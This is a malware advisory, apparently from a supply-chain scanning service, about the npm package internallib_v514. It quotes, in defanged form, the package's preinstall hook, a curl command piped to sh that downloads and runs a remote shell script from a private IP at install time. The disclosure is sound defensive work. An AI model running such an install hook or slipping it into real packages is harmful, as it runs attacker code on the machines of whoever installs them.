LWA-2026-10662 MAL-2026-13483 ↗ confirmed malware

internallib_v514@1.0.1

Malicious code in internallib_v514 (npm)

T1059.007 · JavaScriptT1105 · Ingress Tool TransferT1071 · Application Layer Protocol

Analysis

The package's preinstall hook runs `/usr/bin/curl hxxp://10[.]0[.]70[.]90/rev[.]sh | sh`, fetching and executing a remote shell script from the private IP 10[.]0[.]70[.]90 at install time. The package is otherwise an empty stub with no functional code, so installing it executes the remote payload.

analyzed by
Leitwacht
first seen
Aug 7, 2026, 12:11 AM
analyzed
Aug 7, 2026, 12:12 AM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.